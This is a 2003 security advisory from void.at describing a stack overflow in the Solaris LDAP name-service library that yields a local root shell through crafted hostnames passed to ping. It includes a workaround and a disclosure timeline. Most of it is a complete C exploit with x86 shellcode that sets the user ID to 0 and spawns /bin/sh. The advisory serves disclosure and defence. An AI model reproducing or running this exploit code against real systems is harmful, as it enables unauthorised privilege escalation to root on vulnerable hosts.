-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [void.at Security Advisory VSA0309 - mailto:crew at void dot at] Overview ======== A stack overflow bug in the LDAP libraries allows a local attacker to gain root privileges. If LDAP is enabled in /etc/nsswitch.conf, programs that resolve hostnames can be exploited with specially crafted hostnames. I've also tested it against sendmail (remote), but there the hostname is limited to 255 bytes. Affected Versions ================= PKGINST: SUNWlldap NAME: LDAP Libraries CATEGORY: system ARCH: i386 VERSION: 11.8.0,REV=2000.01.08.18.17 BASEDIR: / VENDOR: Sun Microsystems, Inc. DESC: Ldap libraries in for software development of dynamically linked executables PSTAMP: on28-patch-x20020215173655 INSTDATE: Apr 23 2002 17:19 HOTLINE: Please contact your local service provider STATUS: completely installed FILES: 10 installed pathnames 3 shared pathnames 1 linked files 3 directories 4 executables 200 blocks used (approx) Impact ====== Medium. Local root shell if LDAP is enabled in /etc/nsswitch.conf. Workaround: =========== Disable ldap for the hosts and ipnodes entries in /etc/nsswitch.conf Details ======= $ ping aaaa.... Segmentation Fault (core dumped) $ gdb ping core #0 0xdf923f13 in getbyname () from /usr/lib/nss_ldap.so.1 #1 0x61616161 in ?? () Cannot access memory at address 0x61616161 (gdb) It also works for traceroute. To exploit this vulnerability we need to modify the shellcode a little, because some bytes are overwritten by the program after execution. Sample exploitation session =========================== bash-2.03$ uname -a SunOS mail 5.8 Generic_108529-11 i86pc i386 i86pc bash-2.03$ ./hoagie_solarisldap hoagie_solarisldap local root exploit [*] offset: 0x23f8 [*] return address: 0x8045770 # Exploit ======= Please find attached a demonstration exploit. 
Discovered by ============= Andi Timeline ======== 03-05-2003: informed Sunsolve Team 03-11-2003: no reply from Sunsolve Team -> public release Credits ======= void.at ================================================================== /*********************************************************** * hoagie_solarisldap.c * * gcc hoagie_solarisldap.c -o hoagie_solarisldap * * Author: Andi * * Greetz to Greuff, philipp and the other hoagie-fellas :-) * * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF- * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY * DAMAGE DONE USING THIS PROGRAM. * * * Offsets: 9208 ... without patch 108994-11 * ************************************************************/ #include #define NOP 0x90 #define ORIGSIZE 258 char shellcode[]= /* main: */ "\xeb\x0a" /* jmp initcall */ /* initlcall: */ "\x9a\x01\x02\x03\x5c\x07\x04" /* lcall */ "\xc3" /* ret */ /* jmpz: */ "\xeb\x05" /* jmp setuidcode */ /* initcall: */ "\xe8\xf9\xff\xff\xff" /* call jmpz */ /* setuidcode: */ "\x5e" /* popl %esi */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\xf7" /* movb %al, 0xfffffff7(%esi) */ "\x89\x46\xf2" /* movl %eax, 0xfffffff2(%esi) */ /* seteuid(0); */ "\x50" /* pushl %eax */ "\xb0\x8d" /* movb $0x8d, %al */ "\xe8\xe0\xff\xff\xff" /* call initlcall */ /* setuid(0); */ "\x29\xc0" /* subl %eax, %eax */ "\x50" /* pushl %eax */ "\xb0\x17" /* movb $0x17, %al */ "\xe8\xd6\xff\xff\xff" /* call initlcall */ "\xeb\x1f" /* jmp callz */ /* start: */ /* execve /bin/sh */ "\x5e" /* popl %esi */ "\x8d\x1e" /* leal (%esi), %ebx */ "\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */ "\x29\xc0" /* subl %eax, %eax */ "\x88\x46\x19" /* movb %al, 0x19(%esi) */ "\x89\x46\x14" /* movl %eax, 0x14(%esi) */ "\x89\x46\x0f" /* movl %eax, 0x0f(%esi) */ "\x89\x46\x07" /* movl %eax, 0x07(%esi) */ "\xb0\x3b" /* movb $0x3b, %al */ "\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */ "\x51" /* pushl %ecx */ "\x51" /* pushl %ecx */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\xeb\x18" /* jmp lcall 
*/ /* callz: */ "\xe8\xdc\xff\xff\xff" /* call start */ "\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh */ "\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03" /* lcall: */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */ unsigned long getsp(void) { __asm__(" movl %esp,%eax "); } int main(int argc, char **argv) { char buf[512]; int offset = 9208; int retaddr = 0; int i; if (argc > 1) { sscanf(argv[1], "%d", &offset); } printf("hoagie_solarisldap local root exploit\n"); printf("[*] offset: 0x%x\n", offset); memset(buf, NOP, sizeof(buf)); buf[28] = 0xeb; buf[29] = 30; for (i = 0; i < strlen(shellcode); i++) { buf[i + 60] = shellcode[i]; } retaddr = getsp() - offset; printf("[*] return address: 0x%x\n", retaddr); for (i = 0; i < 4 * 25; i += 4){ buf[i + ORIGSIZE + 2] = retaddr & 0xff; buf[i + ORIGSIZE + 3] = (retaddr >> 8 ) &0xff; buf[i + ORIGSIZE + 0] = (retaddr >> 16 ) &0xff; buf[i + ORIGSIZE + 1] = (retaddr >> 24 ) &0xff; } execl("/usr/sbin/ping", "ping", buf, NULL); } -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iEUEARECAAYFAj5uA2oACgkQzxi8qAgTjUNqtACdGYswAgkvSl9dCR4Vf+MEORa7 qfcAmNxXYiXh7qt4ldYtJZ4lnv6GktY= =pkng -----END PGP SIGNATURE-----